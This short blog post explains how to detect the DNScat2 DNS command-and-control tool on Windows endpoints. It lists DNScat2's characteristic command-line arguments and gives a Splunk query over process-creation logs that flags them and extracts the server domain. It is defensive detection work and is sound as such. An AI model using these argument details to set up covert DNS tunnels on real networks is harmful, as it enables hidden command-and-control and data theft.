It is always DNS
For those following along with ATT&CK this entry is about Application Layer Protocol: DNS, Command And Control technique T1071.
Looking at DNScat2 I was interested in detecting activity on the endpoint to save picking through voluminous network logs. If we take a look at the structure of command line args shown on github we can see some potential detections already, even if the binary itself is renamed.
So the cli args we are looking for are "--secret", "--dns", "port" and "host", as well as an FQDN or IP address for the server side.
Throwing together a really rough detection we can say that if the DNScat2 process is executed from the cli in Windows then we are looking at a Creator Process Name of cmd.exe and we can use urltoolbox in place of an unwieldy huge regex to find our server address in the field.
Our SPL will look something like this
index=win10 sourcetype="WinEventLog:Security" EventCode=4688 Creator_Process_Name=C:\\Windows\\*\\cmd.exe Process_Command_Line="* --secret=*"| eval utlist="*"| `ut_parse_extended(Process_Command_Line, utlist)`| where ut_domain!="None"| table _time Account_Name ComputerName New_Process_Name Process_Command_Line ut_domain
Here's a screenshot of this SPL in operation